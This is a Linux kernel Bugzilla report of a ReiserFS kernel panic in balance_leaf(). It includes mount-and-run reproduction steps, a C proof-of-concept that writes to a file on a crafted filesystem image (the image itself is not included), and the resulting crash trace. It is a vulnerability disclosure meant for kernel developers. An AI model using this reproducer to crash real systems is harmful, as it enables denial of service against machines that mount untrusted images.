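https://bugzilla.kernel.org/show_bug.cgi?id=200337 Bug ID: 200337 Summary: Kernel panic in balance_leaf() when writing file in reiserfs file system Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 276991 --> https://bugzilla.kernel.org/attachment.cgi?id=276991&action=edit The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t reiserfs -o acl,user_xattr 212.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/falloc.h>
#include <linux/loop.h>

/*
 * Trigger the crash: open <mpoint>/foo/bar/baz on the already-mounted
 * crafted image and write into it twice.  The data written is all zeros;
 * what is malicious is the on-disk image, so the attacker model is
 * "someone who can get this image mounted".  The effect shown in the
 * trace below is reiserfs_panic() -> BUG at fs/reiserfs/prints.c:369,
 * i.e. a kernel crash (denial of service), reached via
 * reiserfs_get_block() -> reiserfs_paste_into_item() -> do_balance()
 * -> balance_leaf() from the write() path.
 *
 * mpoint: mount point of the crafted image.
 *
 * Returns 0 when both writes were issued, -1 (errno set by the failing
 * call) if the path could not be built or the file could not be opened.
 * On a vulnerable kernel the second write() does not return.
 */
static int activity(const char *mpoint)
{
	/* static storage is zero-initialized; no memset needed */
	static int buf[8192];
	char *path = NULL;
	int fd;
	int rc = -1;

	/*
	 * asprintf() leaves *strp undefined on failure (glibc), so the
	 * result must be checked before the pointer is passed to open().
	 */
	if (asprintf(&path, "%s/foo/bar/baz", mpoint) < 0)
		return -1;

	/* open / write (mode is irrelevant without O_CREAT, kept as in the report) */
	fd = open(path, O_RDWR | O_TRUNC, 0777);
	if (fd < 0) {
		perror(path);
		goto out_free;
	}

	/*
	 * 517 bytes then sizeof(buf) bytes, as in the original reproducer;
	 * return values are only checked so a miss is reported rather than
	 * silently ignored.
	 */
	if (write(fd, buf, 517) < 0 || write(fd, buf, sizeof(buf)) < 0)
		perror("write");
	else
		rc = 0;

	close(fd);
out_free:
	free(path);
	return rc;
}

/*
 * Usage: poc <mountpoint>
 *
 * Checks argc before touching argv[1]; the original reproducer passed a
 * possibly-NULL argv[1] straight into asprintf().
 */
int main(int argc, char *argv[])
{
	if (argc != 2) {
		fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
		return 1;
	}
	return activity(argv[1]) == 0 ? 0 : 1;
}

- Kernel message
[ 279.746296] REISERFS (device loop0): found reiserfs format "3.6" with standard journal [ 279.746393] REISERFS (device loop0): using ordered data mode [ 279.746399] reiserfs: using flush barriers [ 279.748793] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 [ 279.749734] REISERFS (device loop0): checking transaction log (loop0) [ 280.576711] REISERFS (device loop0): Using r5 hash to sort names [ 287.069428] REISERFS panic (device loop0): vs-12195 balance_leaf: CFR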
not initialized [ 287.069498] ------------[ cut here ]------------ [ 287.069502] kernel BUG at fs/reiserfs/prints.c:369! [ 287.077174] invalid opcode: 0000 [#1] SMP KASAN PTI [ 287.078336] CPU: 0 PID: 1425 Comm: a.out Not tainted 4.18.0-rc1+ #8 [ 287.079609] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 287.081574] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 287.082547] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 287.086363] RSP: 0018:ffff8801effeee40 EFLAGS: 00010282 [ 287.087434] RAX: 0000000000000049 RBX: ffffffffa6939e80 RCX: 0000000000000000 [ 287.088866] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003dffddbe [ 287.090308] RBP: ffff8801effeeef0 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 287.091740] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801df059100 [ 287.093173] R13: ffffffffa693a080 R14: 0000000000000000 R15: ffff8801eb1e2a80 [ 287.094624] FS: 00007f9138c40700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 287.096244] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.097400] CR2: 00007f91386f1760 CR3: 00000001ef0ae000 CR4: 00000000000006f0 [ 287.098852] Call Trace: [ 287.099374] ? reiserfs_debug+0x10/0x10 [ 287.100169] ? leaf_paste_in_buffer+0x2c1/0x3a0 [ 287.101100] balance_leaf+0x4749/0x4800 [ 287.101919] ? wake_bit_function+0x90/0x90 [ 287.102795] ? kasan_check_read+0x11/0x20 [ 287.103616] ? get_neighbors+0x20e/0x450 [ 287.104423] ? replace_key+0xf0/0xf0 [ 287.105160] do_balance+0x219/0x430 [ 287.105880] ? do_balance+0x219/0x430 [ 287.106649] ? get_right_neighbor_position+0x80/0x80 [ 287.107661] ? create_virtual_node+0x9d0/0x9d0 [ 287.108571] ? memset+0x31/0x40 [ 287.109222] reiserfs_paste_into_item+0x35d/0x3b0 [ 287.110197] ? reiserfs_delete_object+0xd0/0xd0 [ 287.111130] ? __kmalloc+0x11f/0x240 [ 287.111865] ? 
reiserfs_get_block+0x89d/0x1c40 [ 287.112769] reiserfs_get_block+0x9a6/0x1c40 [ 287.113641] ? reiserfs_commit_write+0x390/0x390 [ 287.114592] ? __asan_loadN+0xf/0x20 [ 287.115362] ? number+0x427/0x5d0 [ 287.116053] ? kasan_check_read+0x11/0x20 [ 287.116888] ? node_page_state+0x2f/0x50 [ 287.117698] ? replace_slot+0x111/0x130 [ 287.118500] ? kasan_unpoison_shadow+0x36/0x50 [ 287.119411] ? kasan_kmalloc+0xad/0xe0 [ 287.120194] ? memcg_kmem_put_cache+0x1b/0xa0 [ 287.121089] ? kmem_cache_alloc+0x17c/0x1e0 [ 287.121959] ? kasan_check_write+0x14/0x20 [ 287.122817] ? create_empty_buffers+0x17e/0x1d0 [ 287.123747] __block_write_begin_int+0x296/0x940 [ 287.124689] ? reiserfs_commit_write+0x390/0x390 [ 287.125631] ? __block_write_begin_int+0x296/0x940 [ 287.126621] ? reiserfs_commit_write+0x390/0x390 [ 287.127567] ? __breadahead+0xd0/0xd0 [ 287.128323] ? reiserfs_wait_on_write_block+0xa6/0x140 [ 287.129368] ? reiserfs_allow_writes+0x50/0x50 [ 287.130309] ? pagecache_get_page+0xca/0x2f0 [ 287.131191] ? wait_for_stable_page+0x77/0xf0 [ 287.132083] __block_write_begin+0x11/0x20 [ 287.132921] reiserfs_write_begin+0x1a5/0x380 [ 287.133824] ? timespec64_trunc+0x5c/0x90 [ 287.134659] generic_perform_write+0x192/0x320 [ 287.135567] ? __bpf_trace_filemap_set_wb_err+0x10/0x10 [ 287.136627] ? file_update_time+0x1d2/0x270 [ 287.137482] ? current_time+0x110/0x110 [ 287.138282] ? save_stack+0xb5/0xd0 [ 287.139000] __generic_file_write_iter+0x261/0x2e0 [ 287.139991] ? do_syscall_64+0x78/0x170 [ 287.140784] generic_file_write_iter+0x19d/0x2d0 [ 287.141736] __vfs_write+0x286/0x410 [ 287.142488] ? kernel_read+0xa0/0xa0 [ 287.143251] ? common_file_perm+0x11b/0x2e0 [ 287.144109] ? may_open_dev+0x50/0x50 [ 287.144864] ? apparmor_task_setrlimit+0x270/0x270 [ 287.145839] ? fsnotify+0x590/0x7d0 [ 287.146569] ? rw_verify_area+0x78/0x140 [ 287.147370] vfs_write+0xf9/0x260 [ 287.148054] ksys_write+0xb4/0x140 [ 287.148755] ? __ia32_sys_read+0x50/0x50 [ 287.149563] ? 
vm_brk+0x20/0x20 [ 287.150227] __x64_sys_write+0x43/0x50 [ 287.150996] do_syscall_64+0x78/0x170 [ 287.151762] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 287.152797] RIP: 0033:0x7f91387522c0 [ 287.153529] Code: 73 01 c3 48 8b 0d d8 cb 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d 89 24 2d 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 fe dd 01 00 48 89 04 24 [ 287.157321] RSP: 002b:00007ffca08cac68 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 287.158846] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f91387522c0 [ 287.160273] RDX: 0000000000000205 RSI: 00000000006010a0 RDI: 0000000000000003 [ 287.161697] RBP: 00007ffca08caca0 R08: 00000000007bc010 R09: 0000000000000000 [ 287.163135] R10: 000000000000086f R11: 0000000000000246 R12: 00000000004006e0 [ 287.164561] R13: 00007ffca08cada0 R14: 0000000000000000 R15: 0000000000000000 [ 287.166005] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 287.181052] ---[ end trace 2e85051acb5f6dc1 ]--- [ 287.182112] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 287.183057] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 287.187017] RSP: 0018:ffff8801effeee40 EFLAGS: 00010282 [ 287.188128] RAX: 0000000000000049 RBX: ffffffffa6939e80 RCX: 0000000000000000 [ 287.189564] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003dffddbe [ 287.191001] RBP: 
ffff8801effeeef0 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 287.192464] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801df059100 [ 287.193892] R13: ffffffffa693a080 R14: 0000000000000000 R15: ffff8801eb1e2a80 [ 287.195338] FS: 00007f9138c40700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 287.196992] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.198162] CR2: 00007f91386f1760 CR3: 00000001ef0ae000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/do_balan.c#L1450 if (tb->CFL[0]) { if (!tb->CFR[0]) reiserfs_panic(tb->tb_sb, "vs-12195", "CFR not initialized"); Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech.